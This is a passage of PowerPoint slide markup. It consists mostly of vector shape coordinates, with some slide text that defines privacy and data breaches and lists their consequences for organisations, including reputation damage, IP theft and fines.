                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1959292" y="3164230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2005723" y="3151848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2051824" y="3138017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2097570" y="3122726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142909" y="3105988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2187816" y="3087789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2232253" y="3068129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2276195" y="3047022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2319591" y="3024454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2362403" y="3000438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2404605" y="2974949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2446172" y="2948013"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3159759" h="3211195">
                <a:moveTo>
                  <a:pt x="2446172" y="263740"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2404605" y="236715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2362403" y="211150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2319591" y="187032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2276195" y="164388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2232253" y="143192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2187816" y="123469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142909" y="105206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2097570" y="88404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2051824" y="73063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2005723" y="59182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1959292" y="46761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1912581" y="35801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1865617" y="26301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1818436" y="18262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1771065" y="11684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1723567" y="6578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1675942" y="2921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1628254" y="736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1580540" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1532813" y="736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1485125" y="2921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1437500" y="6578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1390002" y="11684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1342631" y="18262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295450" y="26301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1248486" y="35801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1201775" y="46761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1155344" y="59182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1109243" y="73063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1063498" y="88404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1018159" y="105206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="973251" y="123469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928814" y="143192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="884872" y="164388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="841476" y="187032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="798664" y="211150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="756462" y="236715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="714908" y="263740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="754151" y="303745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="796353" y="277202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="839190" y="252171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="882637" y="228663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="926630" y="206667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="971156" y="186194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1016165" y="167233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1061618" y="149783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1107490" y="133858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1153731" y="119443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1200302" y="106553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1247178" y="95173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1294320" y="85318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1341678" y="76974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1389227" y="70142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1436916" y="64833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1484731" y="61036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1532610" y="58762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1580540" y="58013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1628457" y="58762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1676336" y="61036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1724152" y="64833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1771840" y="70142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1819389" y="76974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1866747" y="85318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1913890" y="95173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1960765" y="106553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2007336" y="119443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2053577" y="133858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2099449" y="149783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2144903" y="167233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2189911" y="186194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2234438" y="206667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2278430" y="228663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2321877" y="252171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2364714" y="277202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2406929" y="303745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2446172" y="263740"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3159759" h="3211195">
                <a:moveTo>
                  <a:pt x="2915564" y="1888705"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2868447" y="1888705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2857309" y="1936508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2844533" y="1983613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2830144" y="2030006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2814167" y="2075637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2796654" y="2120493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2777617" y="2164537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2757106" y="2207717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2735135" y="2250033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2711742" y="2291423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2686964" y="2331859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2660840" y="2371331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2633383" y="2409774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2604643" y="2447175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2574645" y="2483497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2543416" y="2518714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2511006" y="2552776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2477414" y="2585669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2442718" y="2617343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2406904" y="2647785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2370036" y="2676944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2332139" y="2704795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2293239" y="2731300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2253373" y="2756433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2212568" y="2780157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2170874" y="2802445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2128291" y="2823260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2084882" y="2842577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2040661" y="2860344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1995678" y="2876537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1949945" y="2891129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1903501" y="2904096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1856384" y="2915374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1856384" y="2963126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1904555" y="2952153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1952040" y="2939504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1998827" y="2925203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2044865" y="2909290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2090127" y="2891790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2134590" y="2872740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2178202" y="2852166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2220963" y="2830106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2262809" y="2806598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2303729" y="2781655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2343696" y="2755328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2382659" y="2727642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2420594" y="2698635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2457475" y="2668320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2493264" y="2636748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2527935" y="2603944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2561463" y="2569934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2593797" y="2534755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2624925" y="2498445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2654795" y="2461031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2683395" y="2422550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2710688" y="2383028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2736646" y="2342489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2761221" y="2300973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2784398" y="2258517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2806154" y="2215159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2826423" y="2170912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2845206" y="2125815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2862465" y="2079891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2878150" y="2033193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2892260" y="1985746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2904731" y="1937575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2915564" y="1888705"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3159759" h="3211195">
                <a:moveTo>
                  <a:pt x="2915564" y="1324825"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2904731" y="1275829"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2892260" y="1227531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2878150" y="1179944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2862465" y="1133106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2845206" y="1087069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2826423" y="1041844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2806154" y="997470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2784398" y="953985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2761221" y="911415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2736646" y="869784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2710688" y="829132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2683395" y="789495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2654795" y="750912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2624925" y="713384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2593797" y="676973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2561463" y="641705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2527935" y="607606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2493264" y="574700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2457475" y="543039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2420594" y="512648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2382659" y="483552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2343696" y="455790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2303729" y="429387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2262809" y="404380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2220963" y="380796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2178202" y="358673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2134590" y="338048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2090127" y="318935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2044865" y="301383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1998827" y="285419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1952040" y="271068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1904555" y="258381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1856384" y="247357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1856384" y="295236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1903501" y="306565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1949945" y="319570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1995678" y="334213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2040661" y="350456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2084882" y="368287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2128291" y="387654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2170874" y="408533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2212568" y="430885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2253373" y="454672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2293239" y="479882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2332139" y="506476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2370036" y="534403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2406904" y="563651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2442718" y="594169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2477414" y="625944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2510993" y="658926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2543416" y="693089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2574645" y="728395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2604643" y="764819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2633383" y="802335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2660840" y="840892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2686964" y="880465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2711742" y="921016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2735135" y="962520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2757106" y="1004951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2777617" y="1048258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2796654" y="1092415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2814167" y="1137386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2830144" y="1183157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2844533" y="1229677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2857309" y="1276908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2868447" y="1324825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2915564" y="1324825"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3159759" h="3211195">
                <a:moveTo>
                  <a:pt x="3159544" y="1582407"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3158185" y="1535226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3155442" y="1488097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3151352" y="1441056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3145891" y="1394129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3139059" y="1347343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3130867" y="1300759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3121304" y="1254391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3110382" y="1208278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3098088" y="1162443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3084436" y="1116939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3069412" y="1071791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3053016" y="1027023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3035262" y="982687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3016148" y="938796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2995663" y="895413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2973806" y="852538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2950591" y="810234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2926016" y="768515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2900070" y="727417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2860700" y="767295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2886138" y="808977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2910179" y="851255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2932798" y="894118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954007" y="937514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2973794" y="981417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2992170" y="1025791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3009138" y="1070597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3024695" y="1115822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3038830" y="1161402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3051556" y="1207312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3062871" y="1253515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3072765" y="1299984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3081248" y="1346682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3088309" y="1393571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3093974" y="1440611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3098215" y="1487779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3101035" y="1535036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3102457" y="1582343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3102457" y="1629676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3101035" y="1676984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3098215" y="1724240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3093974" y="1771408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3088309" y="1818449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3081248" y="1865337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3072765" y="1912035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3062871" y="1958505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3051556" y="2004707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3038830" y="2050618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3024695" y="2096198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3009138" y="2141423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2992170" y="2186228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2973794" y="2230602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954007" y="2274506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2932798" y="2317902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2910179" y="2360765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2886138" y="2403043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2860700" y="2444712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2900070" y="2484590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2926016" y="2443505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2950591" y="2401786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2973806" y="2359482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2995663" y="2316607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3016148" y="2273223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3035262" y="2229332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3053016" y="2184997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3069412" y="2140229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3084436" y="2095080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3098088" y="2049576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3110382" y="2003742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3121304" y="1957628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3130867" y="1911261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3139059" y="1864677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3145891" y="1817890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3151352" y="1770964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3155442" y="1723923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3158185" y="1676793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3159544" y="1629613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3159544" y="1582407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987423" y="1882292"/>
            <a:ext cx="12275185" cy="17259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9855" marR="5080" indent="-97790">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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breach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occurs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when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information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is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read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modified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without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authorization.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loss </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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any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type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data.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Privacy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breach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refers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loss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disclosure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personal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sensitive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data.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3000">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="311785">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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privacy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breach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ma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lead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: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96103" y="306451"/>
            <a:ext cx="646049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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Privacy</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Breaches</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and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185">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Breaches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1984" y="760476"/>
            <a:ext cx="8964167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619625" y="1930145"/>
            <a:ext cx="706310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gan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za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ti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nal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consequen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da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bre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ca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be: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44239" y="3477538"/>
            <a:ext cx="3340100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4470" marR="5080" indent="-192405">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1915160" algn="l"/>
                <a:tab pos="3326765" algn="l"/>
              </a:tabLst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Reputation 	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="dash" sz="2200" spc="-165">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="EE6360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dirty="0" u="dash" sz="2200" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="EE6360"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>	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 damage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917681" y="3730244"/>
            <a:ext cx="96393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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>IP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heft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153902" y="6782181"/>
            <a:ext cx="69977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F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nes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793992" y="3911917"/>
            <a:ext cx="3569970" cy="3060065"/>
            <a:chOff x="6793992" y="3911917"/>
            <a:chExt cx="3569970" cy="3060065"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="object 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6793992" y="3957827"/>
              <a:ext cx="2783205" cy="2783205"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2783204" h="2783204">
                  <a:moveTo>
